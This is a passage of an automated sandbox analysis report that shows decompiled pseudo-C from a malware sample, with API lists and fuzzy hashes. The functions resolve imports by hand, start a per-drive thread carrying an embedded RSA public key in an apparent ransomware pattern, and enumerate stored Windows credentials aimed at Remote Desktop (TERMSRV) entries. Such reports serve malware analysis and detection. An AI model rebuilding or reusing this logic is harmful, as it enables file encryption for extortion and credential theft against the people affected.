                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$AllocCreateFreeThread
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3966119241-0
                                                                                                                                                              • Opcode ID: e4a2a74214a3a912b1d88c058ad9ab15344a04cf0e907b4ba74471d8c84cd8fd
                                                                                                                                                              • Instruction ID: 3209472d6248e7301cb23fa86f41dffee1734df4f18298a2e21098835df47f39
                                                                                                                                                              • Opcode Fuzzy Hash: e4a2a74214a3a912b1d88c058ad9ab15344a04cf0e907b4ba74471d8c84cd8fd
                                                                                                                                                              • Instruction Fuzzy Hash: DEF0D0B6500219BFD7206FA69E8DD9FBFACEB85795B104429F641A3100D579DD04CA60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                              			E04E29016() {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                              				long _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				void* _t48;
                                                                                                                                                              				int _t53;
                                                                                                                                                              				int _t57;
                                                                                                                                                              				struct HINSTANCE__* _t60;
                                                                                                                                                              				intOrPtr _t61;
                                                                                                                                                              				signed int _t62;
                                                                                                                                                              				signed int _t63;
                                                                                                                                                              				long _t66;
                                                                                                                                                              				intOrPtr* _t70;
                                                                                                                                                              				intOrPtr _t71;
                                                                                                                                                              				signed int _t73;
                                                                                                                                                              				intOrPtr _t75;
                                                                                                                                                              				signed int _t77;
                                                                                                                                                              				signed int* _t80;
                                                                                                                                                              				intOrPtr _t82;
                                                                                                                                                              				signed int* _t85;
                                                                                                                                                              
                                                                                                                                                              				_t71 =  *0x4e37b98;
                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                              				_t48 =  *((intOrPtr*)(_t71 + 0x3c)) + _t71;
                                                                                                                                                              				_t70 =  *((intOrPtr*)(_t48 + 0x80)) + _t71;
                                                                                                                                                              				if(_t70 != 0) {
                                                                                                                                                              					_v12 = _v12 & 0x00000000;
                                                                                                                                                              					_t77 =  *(_t48 + 6) & 0x0000ffff;
                                                                                                                                                              					_t82 = ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x18;
                                                                                                                                                              					_v16 = _t82;
                                                                                                                                                              					if(_t77 > 0) {
                                                                                                                                                              						_t66 =  *((intOrPtr*)(_t48 + 0xd8));
                                                                                                                                                              						_v20 = _t66;
                                                                                                                                                              						do {
                                                                                                                                                              							_t75 =  *((intOrPtr*)(_t82 + 0xc));
                                                                                                                                                              							if(_t66 < _t75) {
                                                                                                                                                              								goto L5;
                                                                                                                                                              							} else {
                                                                                                                                                              								_v24 =  *(_t82 + 8) + _t75;
                                                                                                                                                              								_t66 = _v20;
                                                                                                                                                              								if(_t66 >= _v24) {
                                                                                                                                                              									goto L5;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							goto L6;
                                                                                                                                                              							L5:
                                                                                                                                                              							_v12 = _v12 + 1;
                                                                                                                                                              							_t82 = _t82 + 0x28;
                                                                                                                                                              							_v16 = _t82;
                                                                                                                                                              						} while (_v12 < _t77);
                                                                                                                                                              					}
                                                                                                                                                              					L6:
                                                                                                                                                              					_t53 = VirtualProtect( *((intOrPtr*)(_t82 + 0xc)) + _t71,  *(_t82 + 8), 4,  &_v20); // executed
                                                                                                                                                              					if(_t53 != 0) {
                                                                                                                                                              						_v8 = 1;
                                                                                                                                                              						if( *_t70 == 0) {
                                                                                                                                                              							L22:
                                                                                                                                                              							_t57 = VirtualProtect( *((intOrPtr*)(_t82 + 0xc)) +  *0x4e37b98,  *(_t82 + 8), _v20,  &_v20); // executed
                                                                                                                                                              							_v8 = _t57;
                                                                                                                                                              						} else {
                                                                                                                                                              							while(_v8 == 1) {
                                                                                                                                                              								_t60 = LoadLibraryA( *((intOrPtr*)(_t70 + 0xc)) +  *0x4e37b98); // executed
                                                                                                                                                              								_v12 = _t60;
                                                                                                                                                              								if(_t60 == 0) {
                                                                                                                                                              									_v8 = _v8 & 0x00000000;
                                                                                                                                                              								} else {
                                                                                                                                                              									_t61 =  *0x4e37b98;
                                                                                                                                                              									_t85 =  *((intOrPtr*)(_t70 + 0x10)) + _t61;
                                                                                                                                                              									_t80 =  *_t70 + _t61;
                                                                                                                                                              									while(1) {
                                                                                                                                                              										_t62 =  *_t80;
                                                                                                                                                              										if(_t62 == 0) {
                                                                                                                                                              											break;
                                                                                                                                                              										}
                                                                                                                                                              										if(_v8 == 1) {
                                                                                                                                                              											_t73 = _t62 & 0x7fffffff;
                                                                                                                                                              											if(_t73 != _t62) {
                                                                                                                                                              												_push(_t73);
                                                                                                                                                              											} else {
                                                                                                                                                              												_push( *0x4e37b98 + _t73 + 2);
                                                                                                                                                              											}
                                                                                                                                                              											_t63 = GetProcAddress(_v12, ??); // executed
                                                                                                                                                              											 *_t85 = _t63;
                                                                                                                                                              											if(_t63 == 0) {
                                                                                                                                                              												_v8 = _v8 & _t63;
                                                                                                                                                              											}
                                                                                                                                                              											_t85 =  &(_t85[1]);
                                                                                                                                                              											_t80 =  &(_t80[1]);
                                                                                                                                                              											continue;
                                                                                                                                                              										}
                                                                                                                                                              										break;
                                                                                                                                                              									}
                                                                                                                                                              									_t82 = _v16;
                                                                                                                                                              								}
                                                                                                                                                              								_t70 = _t70 + 0x14;
                                                                                                                                                              								if( *_t70 != 0) {
                                                                                                                                                              									continue;
                                                                                                                                                              								}
                                                                                                                                                              								break;
                                                                                                                                                              							}
                                                                                                                                                              							if(_v8 != 0) {
                                                                                                                                                              								goto L22;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _v8;
                                                                                                                                                              			}
























                                                                                                                                                              0x04e2901c
                                                                                                                                                              0x04e29025
                                                                                                                                                              0x04e29029
                                                                                                                                                              0x04e29032
                                                                                                                                                              0x04e29034
                                                                                                                                                              0x04e2903e
                                                                                                                                                              0x04e29044
                                                                                                                                                              0x04e29048
                                                                                                                                                              0x04e2904c
                                                                                                                                                              0x04e29051
                                                                                                                                                              0x04e29053
                                                                                                                                                              0x04e29059
                                                                                                                                                              0x04e2905c
                                                                                                                                                              0x04e2905c
                                                                                                                                                              0x04e29061
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29063
                                                                                                                                                              0x04e29068
                                                                                                                                                              0x04e2906b
                                                                                                                                                              0x04e29071
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29071
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29073
                                                                                                                                                              0x04e29073
                                                                                                                                                              0x04e29076
                                                                                                                                                              0x04e29079
                                                                                                                                                              0x04e2907c
                                                                                                                                                              0x04e2905c
                                                                                                                                                              0x04e29081
                                                                                                                                                              0x04e29090
                                                                                                                                                              0x04e29098
                                                                                                                                                              0x04e290a1
                                                                                                                                                              0x04e290a8
                                                                                                                                                              0x04e29129
                                                                                                                                                              0x04e2913d
                                                                                                                                                              0x04e29143
                                                                                                                                                              0x04e290aa
                                                                                                                                                              0x04e290aa
                                                                                                                                                              0x04e290ba
                                                                                                                                                              0x04e290c0
                                                                                                                                                              0x04e290c5
                                                                                                                                                              0x04e2914e
                                                                                                                                                              0x04e290cb
                                                                                                                                                              0x04e290cb
                                                                                                                                                              0x04e290d5
                                                                                                                                                              0x04e290d7
                                                                                                                                                              0x04e29112
                                                                                                                                                              0x04e29112
                                                                                                                                                              0x04e29116
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e290df
                                                                                                                                                              0x04e290e3
                                                                                                                                                              0x04e290eb
                                                                                                                                                              0x04e290f9
                                                                                                                                                              0x04e290ed
                                                                                                                                                              0x04e290f6
                                                                                                                                                              0x04e290f6
                                                                                                                                                              0x04e290fd
                                                                                                                                                              0x04e29103
                                                                                                                                                              0x04e29107
                                                                                                                                                              0x04e29109
                                                                                                                                                              0x04e29109
                                                                                                                                                              0x04e2910c
                                                                                                                                                              0x04e2910f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2910f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e290df
                                                                                                                                                              0x04e29118
                                                                                                                                                              0x04e29118
                                                                                                                                                              0x04e2911b
                                                                                                                                                              0x04e29121
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29121
                                                                                                                                                              0x04e29127
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e29127
                                                                                                                                                              0x04e290a8
                                                                                                                                                              0x04e29147
                                                                                                                                                              0x04e2914d

                                                                                                                                                              APIs
                                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,00000004,?), ref: 04E29090
                                                                                                                                                              • LoadLibraryA.KERNELBASE(?), ref: 04E290BA
                                                                                                                                                              • GetProcAddress.KERNELBASE(00000000,?), ref: 04E290FD
                                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04E2913D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3300690313-0
                                                                                                                                                              • Opcode ID: 2f73b4d127c1de416d80ed11341c1552765a896822c83cdf2b7e0f102bfd681c
                                                                                                                                                              • Instruction ID: 5bc90108a674e51d49193acd6eb64825c455623f513bba6d480d0add2cf85a8c
                                                                                                                                                              • Opcode Fuzzy Hash: 2f73b4d127c1de416d80ed11341c1552765a896822c83cdf2b7e0f102bfd681c
                                                                                                                                                              • Instruction Fuzzy Hash: DB418FB1A00229EFDF10CF9ACA88BA9B3F5FF0431AF15A5A9D415A7242D775ED40CB10
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                              			E04E2636B(void* _a4, intOrPtr _a8) {
                                                                                                                                                              				signed char _v8;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				short _v14;
                                                                                                                                                              				short _v16;
                                                                                                                                                              				short _v18;
                                                                                                                                                              				short _v20;
                                                                                                                                                              				long _t24;
                                                                                                                                                              				void* _t27;
                                                                                                                                                              				short _t30;
                                                                                                                                                              				short _t31;
                                                                                                                                                              				void* _t34;
                                                                                                                                                              				void _t35;
                                                                                                                                                              				signed char _t36;
                                                                                                                                                              				signed int _t40;
                                                                                                                                                              				void* _t47;
                                                                                                                                                              
                                                                                                                                                              				_t35 =  *0x4e37bbc;
                                                                                                                                                              				_t24 = GetLogicalDrives(); // executed
                                                                                                                                                              				_v12 = _t24;
                                                                                                                                                              				_v8 = 0x1f;
                                                                                                                                                              				do {
                                                                                                                                                              					_t36 = _v8;
                                                                                                                                                              					_t27 = 1 << _t36;
                                                                                                                                                              					if((_v12 & 1) != 0) {
                                                                                                                                                              						_v20 = _t36 + 0x41;
                                                                                                                                                              						_t30 = 0x3a;
                                                                                                                                                              						_v18 = _t30;
                                                                                                                                                              						_t31 = 0x5c;
                                                                                                                                                              						_v16 = _t31;
                                                                                                                                                              						_v14 = 0;
                                                                                                                                                              						_t27 = GetDriveTypeW( &_v20);
                                                                                                                                                              						if(_t27 == 3) {
                                                                                                                                                              							_t27 = LocalAlloc(0x40, 0x50);
                                                                                                                                                              							if(_t27 != 0) {
                                                                                                                                                              								 *((intOrPtr*)(_t27 + 0x4c)) = _a8;
                                                                                                                                                              								 *_t27 = _t35;
                                                                                                                                                              								 *(_t27 + 0x34) = L"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB";
                                                                                                                                                              								 *(_t27 + 4) = _v20;
                                                                                                                                                              								 *((intOrPtr*)(_t27 + 8)) = _v16;
                                                                                                                                                              								_t40 = 8;
                                                                                                                                                              								_t20 = _t27 + 0xc; // 0xc
                                                                                                                                                              								_t34 = memcpy(_t20, _a4, _t40 << 2);
                                                                                                                                                              								_t47 = _t47 + 0xc;
                                                                                                                                                              								asm("movsb"); // executed
                                                                                                                                                              								_t27 = CreateThread(0, 0, E04E26299, _t34, 0, 0); // executed
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					_t22 =  &_v8;
                                                                                                                                                              					 *_t22 = _v8 - 1;
                                                                                                                                                              				} while ( *_t22 >= 0);
                                                                                                                                                              				return _t27;
                                                                                                                                                              			}


















                                                                                                                                                              0x04e26372
                                                                                                                                                              0x04e2637a
                                                                                                                                                              0x04e26380
                                                                                                                                                              0x04e26383
                                                                                                                                                              0x04e2638a
                                                                                                                                                              0x04e2638a
                                                                                                                                                              0x04e26390
                                                                                                                                                              0x04e26395
                                                                                                                                                              0x04e2639e
                                                                                                                                                              0x04e263a2
                                                                                                                                                              0x04e263a3
                                                                                                                                                              0x04e263a9
                                                                                                                                                              0x04e263aa
                                                                                                                                                              0x04e263b0
                                                                                                                                                              0x04e263b8
                                                                                                                                                              0x04e263c1
                                                                                                                                                              0x04e263c7
                                                                                                                                                              0x04e263d1
                                                                                                                                                              0x04e263d9
                                                                                                                                                              0x04e263dc
                                                                                                                                                              0x04e263de
                                                                                                                                                              0x04e263ea
                                                                                                                                                              0x04e263f0
                                                                                                                                                              0x04e263f3
                                                                                                                                                              0x04e263f4
                                                                                                                                                              0x04e263f8
                                                                                                                                                              0x04e263f8
                                                                                                                                                              0x04e26403
                                                                                                                                                              0x04e26404
                                                                                                                                                              0x04e26404
                                                                                                                                                              0x04e263d1
                                                                                                                                                              0x04e263c1
                                                                                                                                                              0x04e2640a
                                                                                                                                                              0x04e2640a
                                                                                                                                                              0x04e2640a
                                                                                                                                                              0x04e26417

                                                                                                                                                              APIs
                                                                                                                                                              • GetLogicalDrives.KERNELBASE ref: 04E2637A
                                                                                                                                                              • GetDriveTypeW.KERNEL32(?), ref: 04E263B8
                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000050), ref: 04E263C7
                                                                                                                                                              • CreateThread.KERNELBASE ref: 04E26404
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocCreateDriveDrivesLocalLogicalThreadType
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2320387513-0
                                                                                                                                                              • Opcode ID: 5a5c9b59a2ad30b7b3a91120bbb3cd13317bff1dc6c6d09fa3473b2462e18d06
                                                                                                                                                              • Instruction ID: eb57764fb88c72e6417d40f7d1a3fd5bea6042da76b639058da6fb0ea96bfdf5
                                                                                                                                                              • Opcode Fuzzy Hash: 5a5c9b59a2ad30b7b3a91120bbb3cd13317bff1dc6c6d09fa3473b2462e18d06
                                                                                                                                                              • Instruction Fuzzy Hash: 4E11D072A00218EFDB04DFA5DD85EAEBBB5FF88315F10C45AE605EB281D771AA41CB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E2A333(void* __eflags, void* _a4) {
                                                                                                                                                              				short _v36;
                                                                                                                                                              				void* _t13;
                                                                                                                                                              				void* _t24;
                                                                                                                                                              				void* _t32;
                                                                                                                                                              
                                                                                                                                                              				_t32 = __eflags;
                                                                                                                                                              				_t24 = _a4;
                                                                                                                                                              				Sleep( *_t24); // executed
                                                                                                                                                              				_t27 =  *0x4e37bb8;
                                                                                                                                                              				_t22 =  *0x4e37bb8;
                                                                                                                                                              				_t20 = E04E26B0E(_t27, _t32,  &_v36);
                                                                                                                                                              				if(_t8 != 0) {
                                                                                                                                                              					do {
                                                                                                                                                              						_t13 = E04E29F27( &_v36); // executed
                                                                                                                                                              						if(_t13 != 0) {
                                                                                                                                                              							_t22 =  &_v36;
                                                                                                                                                              							E04E26B5F( &_v36, _t27, _t20);
                                                                                                                                                              						}
                                                                                                                                                              						_v36 = 0;
                                                                                                                                                              					} while (E04E26AD0(_t22,  &_v36) != 0);
                                                                                                                                                              					E04E26B46(_t20);
                                                                                                                                                              				}
                                                                                                                                                              				HeapFree(GetProcessHeap(), 0, _t24);
                                                                                                                                                              				return 0;
                                                                                                                                                              			}







                                                                                                                                                              0x04e2a333
                                                                                                                                                              0x04e2a33f
                                                                                                                                                              0x04e2a344
                                                                                                                                                              0x04e2a34a
                                                                                                                                                              0x04e2a355
                                                                                                                                                              0x04e2a35c
                                                                                                                                                              0x04e2a360
                                                                                                                                                              0x04e2a362
                                                                                                                                                              0x04e2a367
                                                                                                                                                              0x04e2a36e
                                                                                                                                                              0x04e2a372
                                                                                                                                                              0x04e2a376
                                                                                                                                                              0x04e2a376
                                                                                                                                                              0x04e2a37d
                                                                                                                                                              0x04e2a38c
                                                                                                                                                              0x04e2a391
                                                                                                                                                              0x04e2a391
                                                                                                                                                              0x04e2a3a0
                                                                                                                                                              0x04e2a3ae

                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNELBASE(?), ref: 04E2A344
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?), ref: 04E2A399
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E2A3A0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$FreeProcessSleep
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 1803097132-3175316637
                                                                                                                                                              • Opcode ID: 9fb8d0d9b5df6d03bc2f262e6ff857c5ffa4fa44888cdcb2a0c8fcdce8291479
                                                                                                                                                              • Instruction ID: 06c1d054e58bf56801e13c1692e457b02537267cb47fba6c1f46c4305ead8dea
                                                                                                                                                              • Opcode Fuzzy Hash: 9fb8d0d9b5df6d03bc2f262e6ff857c5ffa4fa44888cdcb2a0c8fcdce8291479
                                                                                                                                                              • Instruction Fuzzy Hash: 9C0162725043666BE710EFB59E48DABB7ACFF84319F041A29BA11C3054EB24E914C7A1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 35%
                                                                                                                                                              			E04E276F2(intOrPtr _a4) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				signed int _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				char* _t30;
                                                                                                                                                              				signed int _t32;
                                                                                                                                                              				intOrPtr _t33;
                                                                                                                                                              				signed int _t38;
                                                                                                                                                              				signed short* _t41;
                                                                                                                                                              				void* _t44;
                                                                                                                                                              				char* _t45;
                                                                                                                                                              				signed short* _t49;
                                                                                                                                                              
                                                                                                                                                              				_t38 = 0;
                                                                                                                                                              				_t30 =  &_v8;
                                                                                                                                                              				_v12 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				__imp__CredEnumerateW(0, 0, _t30,  &_v12); // executed
                                                                                                                                                              				_v24 = _t30;
                                                                                                                                                              				if(_t30 == 0) {
                                                                                                                                                              					L19:
                                                                                                                                                              					return _v24;
                                                                                                                                                              				}
                                                                                                                                                              				_t32 = 0;
                                                                                                                                                              				_v20 = 0;
                                                                                                                                                              				if(_v8 <= 0) {
                                                                                                                                                              					L18:
                                                                                                                                                              					__imp__CredFree(_v12);
                                                                                                                                                              					goto L19;
                                                                                                                                                              				}
                                                                                                                                                              				do {
                                                                                                                                                              					_t33 =  *((intOrPtr*)(_v12 + _t32 * 4));
                                                                                                                                                              					_t49 =  *(_t33 + 8);
                                                                                                                                                              					if(_t49 == _t38) {
                                                                                                                                                              						L14:
                                                                                                                                                              						if( *((intOrPtr*)(_t33 + 4)) != 2) {
                                                                                                                                                              							goto L16;
                                                                                                                                                              						}
                                                                                                                                                              						L15:
                                                                                                                                                              						E04E26B95(_t49, 0, _a4);
                                                                                                                                                              						goto L16;
                                                                                                                                                              					}
                                                                                                                                                              					_v16 = 8;
                                                                                                                                                              					_t45 = L"TERMSRV/";
                                                                                                                                                              					_t41 = _t49;
                                                                                                                                                              					while( *_t41 ==  *_t45) {
                                                                                                                                                              						_t41 =  &(_t41[1]);
                                                                                                                                                              						_t45 =  &(_t45[2]);
                                                                                                                                                              						_t13 =  &_v16;
                                                                                                                                                              						 *_t13 = _v16 - 1;
                                                                                                                                                              						if( *_t13 != 0) {
                                                                                                                                                              							continue;
                                                                                                                                                              						}
                                                                                                                                                              						_t38 = 0;
                                                                                                                                                              						_t44 = 0;
                                                                                                                                                              						L8:
                                                                                                                                                              						if((0 | _t44 == _t38) == _t38) {
                                                                                                                                                              							goto L14;
                                                                                                                                                              						}
                                                                                                                                                              						_t49 =  &(_t49[8]);
                                                                                                                                                              						if( *((intOrPtr*)(_t33 + 4)) != 1) {
                                                                                                                                                              							goto L14;
                                                                                                                                                              						}
                                                                                                                                                              						if( *((intOrPtr*)(_t33 + 0x30)) != _t38 &&  *((intOrPtr*)(_t33 + 0x1c)) != _t38) {
                                                                                                                                                              							E04E269AE( *((intOrPtr*)(_t33 + 0x30)),  *((intOrPtr*)(_t33 + 0x1c)), _t38);
                                                                                                                                                              						}
                                                                                                                                                              						goto L15;
                                                                                                                                                              					}
                                                                                                                                                              					asm("sbb ecx, ecx");
                                                                                                                                                              					_t44 = ( *_t41 & 0xfffe) + 1;
                                                                                                                                                              					_t38 = 0;
                                                                                                                                                              					goto L8;
                                                                                                                                                              					L16:
                                                                                                                                                              					_t32 = _v20 + 1;
                                                                                                                                                              					_v20 = _t32;
                                                                                                                                                              				} while (_t32 < _v8);
                                                                                                                                                              				goto L18;
                                                                                                                                                              			}

















                                                                                                                                                              0x04e276fd
                                                                                                                                                              0x04e276ff
                                                                                                                                                              0x04e27705
                                                                                                                                                              0x04e27708
                                                                                                                                                              0x04e2770b
                                                                                                                                                              0x04e27711
                                                                                                                                                              0x04e27716
                                                                                                                                                              0x04e277c9
                                                                                                                                                              0x04e277ce
                                                                                                                                                              0x04e277ce
                                                                                                                                                              0x04e2771c
                                                                                                                                                              0x04e2771e
                                                                                                                                                              0x04e27724
                                                                                                                                                              0x04e277c0
                                                                                                                                                              0x04e277c3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e277c3
                                                                                                                                                              0x04e2772c
                                                                                                                                                              0x04e27732
                                                                                                                                                              0x04e27734
                                                                                                                                                              0x04e27739
                                                                                                                                                              0x04e2779c
                                                                                                                                                              0x04e277a0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e277a2
                                                                                                                                                              0x04e277a9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e277a9
                                                                                                                                                              0x04e2773b
                                                                                                                                                              0x04e27742
                                                                                                                                                              0x04e27747
                                                                                                                                                              0x04e27749
                                                                                                                                                              0x04e27751
                                                                                                                                                              0x04e27754
                                                                                                                                                              0x04e27757
                                                                                                                                                              0x04e27757
                                                                                                                                                              0x04e2775a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2775c
                                                                                                                                                              0x04e2775e
                                                                                                                                                              0x04e27760
                                                                                                                                                              0x04e27769
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e2776b
                                                                                                                                                              0x04e27772
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e27777
                                                                                                                                                              0x04e27785
                                                                                                                                                              0x04e27785
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e27777
                                                                                                                                                              0x04e27792
                                                                                                                                                              0x04e27797
                                                                                                                                                              0x04e27798
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e277ae
                                                                                                                                                              0x04e277b1
                                                                                                                                                              0x04e277b2
                                                                                                                                                              0x04e277b5
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,0000FFFF), ref: 04E2770B
                                                                                                                                                              • CredFree.ADVAPI32(?,?,00000000,0000FFFF), ref: 04E277C3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Cred$EnumerateFree
                                                                                                                                                              • String ID: TERMSRV/
                                                                                                                                                              • API String ID: 3403564193-3001602198
                                                                                                                                                              • Opcode ID: c06b1d967553d11ee3477428d8fc56c8532843786f45d6ae8c75057948f2ac45
                                                                                                                                                              • Instruction ID: 19f7adf3566e1fde096a7fed91d75f6f7644a18a0f00cb2edf9125298bb5076a
                                                                                                                                                              • Opcode Fuzzy Hash: c06b1d967553d11ee3477428d8fc56c8532843786f45d6ae8c75057948f2ac45
                                                                                                                                                              • Instruction Fuzzy Hash: 4321A172A01129DFDF14DFA5CEC48AEB7BAFF44319B5594BEE102A7210D730A985CB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 27%
                                                                                                                                                              			E04E2A112(void* __ecx, void* _a4, void* _a7352) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				void _v12;
                                                                                                                                                              				intOrPtr _t10;
                                                                                                                                                              				void* _t16;
                                                                                                                                                              				void* _t21;
                                                                                                                                                              				intOrPtr _t27;
                                                                                                                                                              				void* _t31;
                                                                                                                                                              
                                                                                                                                                              				_t21 = _a4;
